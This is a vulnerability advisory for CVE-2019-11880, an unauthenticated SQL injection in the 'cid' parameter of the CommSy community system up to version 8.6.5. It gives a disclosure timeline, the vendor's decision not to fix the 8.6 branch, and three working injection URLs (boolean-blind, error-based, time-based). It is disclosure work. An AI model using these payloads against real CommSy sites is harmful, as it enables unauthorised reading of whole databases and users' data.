CommSy 8.6.5 - SQL injection
2019-05-15 21:05:12Title:
======
CommSy 8.6.5 - SQL injection
Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:
=======
CVE-2019-11880
Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure
Affected Products:
==================
CommSy <= 8.6.5
Vendor Homepage:
================
https://www.commsy.net
Details:
========
CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered a unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".
Proof of Concept:
=================
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
COUNT(*),CONCAT(0x716a767871,(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
Fix:
====
According to the manufacturer, the version branch 8.6 is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.
Fixes
No fixesIn order to submit a new fix you need to be registered.